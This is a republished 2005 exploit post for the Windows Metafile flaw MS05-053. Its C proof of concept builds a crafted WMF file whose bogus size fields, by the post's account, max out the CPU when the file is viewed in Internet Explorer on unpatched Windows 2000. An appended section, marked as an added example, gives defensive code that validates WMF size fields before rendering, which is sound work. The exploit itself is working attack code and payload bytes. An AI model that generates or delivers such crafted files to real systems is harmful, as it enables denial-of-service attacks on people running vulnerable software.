2005-11-29 Microsoft Windows Metafile (WMF) Images Handling Remote Exploit (MS05-053)
Rated as : Critical 
Note : Proof of concept exploit (DoS)

/*
 * Author: Winny Thomas
 * Pune, INDIA
 *
 * The crafted metafile from this code when viewed in internet explorer raises
 * the CPU utilization to 100%. The code was tested on Windows 2000 server SP4.
 * The issue does not occur with the hotfix for GDI (MS05-053) installed
 *
 * Disclaimer: This code is for educational/testing purposes by authorized
 * persons on networks/systems setup for such a purpose. The author of this
 * code shall not bear any responsibility for any damage caused by using this
 * code.
 *
 */

#include <stdio.h>
#include <string.h>   /* memcpy */

unsigned char wmfheader[] = 
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00"
"\xff\xff\xff\xff" //Largest record size
"\x00\x00";

unsigned char MetafileRECORD[] = 
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xff\xff\xff\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03";

unsigned char wmfeof[] = 
"\x00\x00\x00\x00";

int main(int argc, char *argv[])
{
    FILE *fp;
    unsigned char wmfbuf[1024];
    int metafilesize, metafilesizeW, i, j;

    /* Bytes written: the three arrays minus their NUL terminators */
    metafilesize = sizeof (wmfheader) + sizeof (MetafileRECORD) +
                   sizeof (wmfeof) - 3;
    /* The header's size field is expressed in 16-bit words */
    metafilesizeW = metafilesize / 2;
    memcpy(&wmfheader[28], &metafilesizeW, 4);

    printf("[*] Adding Metafile header\n");
    for (i = 0; i < (int)sizeof (wmfheader) - 1; i++) {
        wmfbuf[i] = wmfheader[i];
    }

    printf("[*] Adding Metafile records\n");
    for (j = i, i = 0; i < (int)sizeof (MetafileRECORD) - 1; i++, j++) {
        wmfbuf[j] = MetafileRECORD[i];
    }

    printf("[*] Adding EOF record\n");
    for (i = 0; i < (int)sizeof (wmfeof) - 1; i++, j++) {
        wmfbuf[j] = wmfeof[i];
    }

    printf("[*] Creating Metafile (MS053.wmf)\n");
    fp = fopen("MS053.wmf", "wb");
    if (fp == NULL) {
        perror("fopen");
        return 1;
    }
    fwrite(wmfbuf, 1, metafilesize, fp);
    fclose(fp);
    return 0;
}
securitydot.net - 2005-11-29
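
The header above leaves its "Largest record size" field at 0xffffffff, far more than the file holds. The following is an added example, not part of the original post and not Microsoft's MS05-053 fix: a sanity check a file scanner or gateway could run on WMF size fields before passing the file to a renderer. The function name, verdict names and sample bytes are constructed for illustration; the field offsets follow the 22-byte placeable header and 18-byte standard header layout used in the listing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Verdict names are this example's own, not from any WMF library. */
enum wmf_verdict { WMF_OK, WMF_TRUNCATED, WMF_BAD_HEADER, WMF_BAD_SIZE,
                   WMF_BAD_MAXRECORD, WMF_BAD_RECORD };

static uint32_t rd16(const uint8_t *p) { return p[0] | ((uint32_t)p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (rd16(p + 2) << 16); }

/* Check the declared size fields of a WMF file against the bytes present. */
enum wmf_verdict wmf_check(const uint8_t *buf, size_t len)
{
    size_t off = 0, pos;
    if (len >= 4 && rd32(buf) == 0x9AC6CDD7u)
        off = 22;                          /* skip the placeable header */
    if (len < off + 18) return WMF_TRUNCATED;
    const uint8_t *h = buf + off;          /* 18-byte standard header */
    if (rd16(h + 2) != 9) return WMF_BAD_HEADER;    /* header size in words */
    uint32_t size_words = rd32(h + 6);     /* declared metafile size */
    uint32_t max_record = rd32(h + 12);    /* declared largest record */
    if (size_words < 9 || size_words > len / 2) return WMF_BAD_SIZE;
    if (max_record < 3 || max_record > size_words) return WMF_BAD_MAXRECORD;
    for (pos = off + 18; len - pos >= 6; ) {
        uint32_t rec_words = rd32(buf + pos);       /* record size in words */
        if (rec_words < 3 || rec_words > max_record ||
            rec_words > (len - pos) / 2) return WMF_BAD_RECORD;
        if (rd16(buf + pos + 4) == 0) return WMF_OK;    /* META_EOF reached */
        pos += (size_t)rec_words * 2;
    }
    return WMF_TRUNCATED;                  /* data ended before META_EOF */
}

/* Constructed samples: 18-byte header + 6-byte META_EOF record (12 words). */
static const uint8_t sample_ok[24] = {
    0x01,0x00, 0x09,0x00, 0x00,0x03, 0x0c,0x00,0x00,0x00, 0x00,0x00,
    0x03,0x00,0x00,0x00, 0x00,0x00,  0x03,0x00,0x00,0x00, 0x00,0x00 };
/* Same bytes, but the largest-record field is 0xffffffff as in the listing. */
static const uint8_t sample_bad[24] = {
    0x01,0x00, 0x09,0x00, 0x00,0x03, 0x0c,0x00,0x00,0x00, 0x00,0x00,
    0xff,0xff,0xff,0xff, 0x00,0x00,  0x03,0x00,0x00,0x00, 0x00,0x00 };

int main(void)
{
    printf("ok=%d bad=%d\n", (int)wmf_check(sample_ok, sizeof sample_ok),
           (int)wmf_check(sample_bad, sizeof sample_bad));
    return 0;
}
```

Real-world metafiles do not always carry accurate size fields, so a deployment would log or quarantine on these verdicts before deciding whether to block outright.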